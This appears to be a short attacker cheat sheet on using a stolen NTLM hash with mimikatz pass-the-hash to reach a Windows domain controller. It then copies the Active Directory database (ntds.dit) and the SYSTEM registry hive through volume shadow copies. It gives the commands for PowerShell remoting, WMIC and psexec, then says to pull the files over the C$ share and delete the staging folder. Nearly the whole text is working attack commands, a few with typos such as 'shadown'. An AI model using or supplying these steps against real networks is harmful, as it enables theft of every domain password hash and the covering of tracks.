Use Pass-the-Hash to exfil ntds.dit

If you have a hash for either a domain admin or a local admin on a domain controller, you can use mimikatz to exfil the entire Active Directory database.

From mimikatz, run the following command to spawn a shell as the target user:

sekurlsa::pth /user:<username> /domain:<domainname> /ntlm:<hash> /run:cmd.exe

Now you have a few options from the new cmd window. For example:

Using powershell

winrm set winrm/config/client ‘@{TrustedHosts=”<computer_name>”}’

Enter-PSSession -ComputerName <computer_name>

vssadmin create shadown /for=c:

mkdir c:\1

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyX\windows\ntds\ntds.dit c:\1

reg save hklm\system c:\1

(HarddiskVolumeShadowCopyX is the shadow copy created by vssadmin)

Using wmic

WMIC /node:”<computer_name>” process call create “cmd.exe /c vssadmin create shadown /for=c:”

WMIC /node:”<computer_name>” process call create “cmd.exe /c mkdir c:\1″

WMIC /node:”<computer_name>” process call create “cmd.exe /ccopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyX\windows\ntds\ntds.dit c:\1”

WMIC /node:”<computer_name>” process call create “cmd.exe /c reg save hklm\system c:\1”

Using psexec

psexec \\<computer_name> vssadmin create shadow /for=c:

psexec \\<computer_name> cmd /c mkdir c:\1

psexec \\<computer_name> cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyX\windows\ntds\ntds.dit c:\1

psexec \\<computer_name> cmd /c reg save hklm\system c:\1

Access the C$ share on the remote machine, retrieve the file and delete the staging folder.